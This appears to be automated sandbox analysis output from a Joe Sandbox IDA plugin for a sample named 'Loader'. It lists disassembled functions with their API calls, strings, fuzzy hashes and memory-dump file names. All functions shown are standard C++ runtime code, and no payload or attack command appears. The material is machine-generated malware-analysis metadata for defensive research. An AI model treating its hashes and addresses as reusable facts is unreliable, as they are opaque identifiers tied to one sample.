Opcode ID: e178c7a2b66856325525ee0b7e97cba5516693e2cf0e247b3c80dcf8a0e1f4e9
Instruction ID: f593dbdb730d3a467935ff141c0dabc0b915a7cab33bf6af1506bfcfe99c68f6
Opcode Fuzzy Hash: e178c7a2b66856325525ee0b7e97cba5516693e2cf0e247b3c80dcf8a0e1f4e9
Instruction Fuzzy Hash: DC01283232A615BEBB3437B47D85A6E2794EB51FB6720C22BF61C445F2EF114C039251

Function 00A7B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00A7B68D
CallUnexpected.LIBVCRUNTIME ref: 00A7B906

Strings

csm, xrefs: 00A7B5AB
csm, xrefs: 00A7B6C4
csm, xrefs: 00A7B618

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 9d3c5447690153b60cc5ad1aaea9953c8bb564f3db07afe88e9f6e841f26fcf9
Instruction ID: da6554835e79643d8ef67698ec85b8e3bd82f00eb2f393e9b9202f50b7e08e26
Opcode Fuzzy Hash: 9d3c5447690153b60cc5ad1aaea9953c8bb564f3db07afe88e9f6e841f26fcf9
Instruction Fuzzy Hash: 69B17BB1810209EFCF15DFA4CD81AAEB7B9BF54310F10C55AF9196B212D731DA61CBA2

Function 00A6BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6BF44
std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6C028

Strings

MOC, xrefs: 00A6BE9F
RCC, xrefs: 00A6BEAB
csm, xrefs: 00A6BEB7

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: e1ec7bf2ff6caee5a017c2ac6098447635a19f22caee9e73c04fa05c12d2f6eb
Instruction ID: 995849ce19085f9cebc3838a686c158f25b465363003b5a1e88ca751040c8dd6
Opcode Fuzzy Hash: e1ec7bf2ff6caee5a017c2ac6098447635a19f22caee9e73c04fa05c12d2f6eb
Instruction Fuzzy Hash: 3441BF74910205DFCF28DF68CA459AEB7B9BF58300B58805DE449E7662C734EA84CF61

Function 00A755C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A877E463,?,?,00000000,00A8BE94,000000FF,?,00A75685,00000002,?,00A75721,00A78396), ref: 00A755F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A7560B
FreeLibrary.KERNEL32(00000000,?,?,00000000,00A8BE94,000000FF,?,00A75685,00000002,?,00A75721,00A78396), ref: 00A7562D

Strings

CorExitProcess, xrefs: 00A75603
mscoree.dll, xrefs: 00A755F2

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
Instruction ID: eefcc7210dd4e8a402ff685ddd373c8c69b006b1ac175ec58baa60323affb04f
Opcode Fuzzy Hash: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
Instruction Fuzzy Hash: 94016231B50659AFDB11CF94DC09BAEBBF8FF04B15F044526F811A6690DFB49901CA94

Function 00A7D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A7D76F
__alloca_probe_16.LIBCMT ref: 00A7D838
__freea.LIBCMT ref: 00A7D89F

Part of subcall function 00A7BF11: RtlAllocateHeap.NTDLL(00000000,00A7DF35,?,?,00A7DF35,00000220,?,00000000,?), ref: 00A7BF43

__freea.LIBCMT ref: 00A7D8B2
__freea.LIBCMT ref: 00A7D8BF

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 1423051803-0
Opcode ID: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
Instruction ID: 7d7f422dcffaa4a3d08942f4e48e47780df11c4294aed7f1dc90a1f89130509e
Opcode Fuzzy Hash: 5fd37f092d825596af274dcf46c23d426e120de1a0a8c5040ce6e22073fe292b
Instruction Fuzzy Hash: 8D51A172600206AFEB259F60DD81EBB7AB9EF84710B15C12DFD0CDB251EB71DC1096A1

Function 00A6EFF1 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A6F005
AcquireSRWLockExclusive.KERNEL32(00A68E38), ref: 00A6F024
AcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F052
TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0AD
TryAcquireSRWLockExclusive.KERNEL32(00A68E38,00A6A2F0,?), ref: 00A6F0C4

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
Instruction ID: 3c4876ce82a86f408938425262c0dfb38033236a4ca8e44af2490a5ccdae6c9e
Opcode Fuzzy Hash: c0aaacc9264e5ab426cbfa1afb928365a20165ec20f65da9bb28ebd77ea6b136
Instruction Fuzzy Hash: FA41CE7160060ADFCB20CF65E48196AB3F4FF05311B214A3AE456C7542EB30F985CF51

Function 00A63C70 Relevance: 7.6, APIs: 5, Instructions: 111COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A63CA5
std::_Lockit::_Lockit.LIBCPMT ref: 00A63CBF
std::_Lockit::~_Lockit.LIBCPMT ref: 00A63CE0
__Getctype.LIBCPMT ref: 00A63D92
std::_Lockit::~_Lockit.LIBCPMT ref: 00A63DD8

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: d58d2e527ec62a170cc823aa1dc984bd7f93264b0e447aca31f0528b27f56b48
Instruction ID: ad58b44c167ffecb72605f8dc2742d8f04d56c0070b85e0996fd8f3210a1c214
Opcode Fuzzy Hash: d58d2e527ec62a170cc823aa1dc984bd7f93264b0e447aca31f0528b27f56b48
Instruction Fuzzy Hash: 3D411472E006188FCB14DF94D945BAABBB1FF94B20F14861AD8156B391DB35AA02CF91

Function 00A6D4C2 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A6D4C9
std::_Lockit::_Lockit.LIBCPMT ref: 00A6D4D3
int.LIBCPMT ref: 00A6D4EA

Part of subcall function 00A6C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 00A6C1F6
Part of subcall function 00A6C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 00A6C210

codecvt.LIBCPMT ref: 00A6D50D
std::_Lockit::~_Lockit.LIBCPMT ref: 00A6D544

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
String ID:
API String ID: 3716348337-0
Opcode ID: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
Instruction ID: 549a932bb34eaa02d69d16fa49eac1dd923b0f3245091af4014775b450616e19
Opcode Fuzzy Hash: 57a12361fb29d9a28319baff32e1bccf7faf0912e54352628924f5fec35a9451
Instruction Fuzzy Hash: D801F931E001158FCF01EBA4CA15ABDBBB5AF84774F144509F416AB2C1CF349E01CB91

Function 00A6ADD7 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00A6ADDE
std::_Lockit::_Lockit.LIBCPMT ref: 00A6ADE9
std::_Lockit::~_Lockit.LIBCPMT ref: 00A6AE57

Part of subcall function 00A6ACAA: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A6ACC2

std::locale::_Setgloballocale.LIBCPMT ref: 00A6AE04
_Yarn.LIBCPMT ref: 00A6AE1A

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
Instruction ID: bba3bb878395a8f9f45b5f41a45fa0cbee2f85e58fd47b92d4b8f9956648e3f6
Opcode Fuzzy Hash: c907e8c6c486f6321f9281281e31b46b114544bb6f2ec126abc6c695092fc004
Instruction Fuzzy Hash: 8C018F75A006209FCB06FBA0DA5557D7BB5FFA4760B18401AE90667382CF396E42CF82

Function 00A6B755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6B809

Strings

RCC, xrefs: 00A6B795
csm, xrefs: 00A6B7A1
MOC, xrefs: 00A6B789

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
Instruction ID: 977edcda10af2cb81a87c36a1541a1cb6a0b615a56c4058799bf19b2b53868b2
Opcode Fuzzy Hash: e5cf386cc5ed18f57de0c76ba7bfa301251284fac922c732ae8a0c6d18e4ae28
Instruction Fuzzy Hash: 2421F235921609DFCF389F94C956A6AB3BCEF54720F14851EE401CB690DB34AEC0CAA0

Function 00A86940 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C), ref: 00A8694D
GetLastError.KERNEL32(?,00A869DC,00000000,?,00A9D2B0,?,?,?,00A86913,00000004,InitializeCriticalSectionEx,00A90D34,00A90D3C,00000000,?,00A7BBBC), ref: 00A86957
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A8697F

Strings

api-ms-, xrefs: 00A86964

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
Instruction ID: ff6ab572dd5f14651975a567438a19e21c9f72231140478af9a3ffb5db01d59b
Opcode Fuzzy Hash: f65367fe10e185bcfb5e365152d56166db8ff95fcd5d3947a3907ae331228a63
Instruction Fuzzy Hash: 19E01A30380204BAEF202BA4EC06B6C3A55AF40B91F184421FA4CA84E0DB72ED659A44

Function 00A83F9E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(A877E463,00000000,00000000,?), ref: 00A84001

Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00A84253
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A84299
GetLastError.KERNEL32 ref: 00A8433C

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
Instruction ID: af67fe55dc6fe746bb720b8030332e92d1f80bd435cd9acea8b2d48c7f62dbe0
Opcode Fuzzy Hash: 3370b4aea18a57f3358c20ef2349d52e25b981828188a954c9811ef19ecd71ba
Instruction Fuzzy Hash: 1CD18A75E042599FCF15DFE8C880AEDBBB5FF18314F28812AE556EB351DA30A942CB50

Function 00A7B295 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00A7B35C
___AdjustPointer.LIBCMT ref: 00A7B37F
___AdjustPointer.LIBCMT ref: 00A7B41B

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f12b65c5f1f7940aff09d3acfbd2d6dfc644f00e786dc87d0d700d04016293ee
Instruction ID: a9501bef1a6f980798829842158267077c8b86dc42314fd93464d49e88976da1
Opcode Fuzzy Hash: f12b65c5f1f7940aff09d3acfbd2d6dfc644f00e786dc87d0d700d04016293ee
Instruction Fuzzy Hash: 4C51D6B2614601DFDB259F54CD91BAA77B4EF00710F14C52DF80A5B691E731EC90DBA0

Function 00A67220 Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A672C5
std::_Throw_Cpp_error.LIBCPMT ref: 00A67395
std::_Throw_Cpp_error.LIBCPMT ref: 00A673A3
std::_Throw_Cpp_error.LIBCPMT ref: 00A673B1

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
Instruction ID: 51274188e0dfa814c27309d5479e5cc069075e2aa0671c2f8de60154cff883df
Opcode Fuzzy Hash: 42672d4b11369948661716f96d95b833ed561cdfecd4e537f0afa20b016a2b92
Instruction Fuzzy Hash: C341F2B1A10705CBDB21EB64C941B6FB7B4FF44324F144639E81A9B791EB34E854CBA1

Function 00A64460 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00A64495
std::_Lockit::_Lockit.LIBCPMT ref: 00A644B2
std::_Lockit::~_Lockit.LIBCPMT ref: 00A644D3
std::_Lockit::~_Lockit.LIBCPMT ref: 00A64580

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
Instruction ID: 351164fa42ca7d1bffc9114f7faf328be23733283236ffb462b42f7c2f6d7cdb
Opcode Fuzzy Hash: ab027e4d7b57a91f7da35171771344f7813b4c2021c24606e958d49bfde184da
Instruction Fuzzy Hash: 3F415A71E006188FCF10DF94D984BAEBBB1FB58720F54422AE81667391DB34AD45CFA1

Function 00A81DC6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00A7C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00A7D895,?,00000000,-00000008), ref: 00A7C082

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E2A
__dosmaperr.LIBCMT ref: 00A81E31
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00A81E6B
__dosmaperr.LIBCMT ref: 00A81E72

Memory Dump Source

Source File: 00000000.00000002.2027305311.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.2027284206.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027453866.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027488046.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027509255.0000000000A9B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027531773.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027551791.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2027596284.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 2ec7f84db76742806daed54dec7e80947df9411042d6aa21287cb87291b60e41
Instruction ID: dd352559415253203dca709655dc7e4247e9334294009602ad57bb7e2663740e
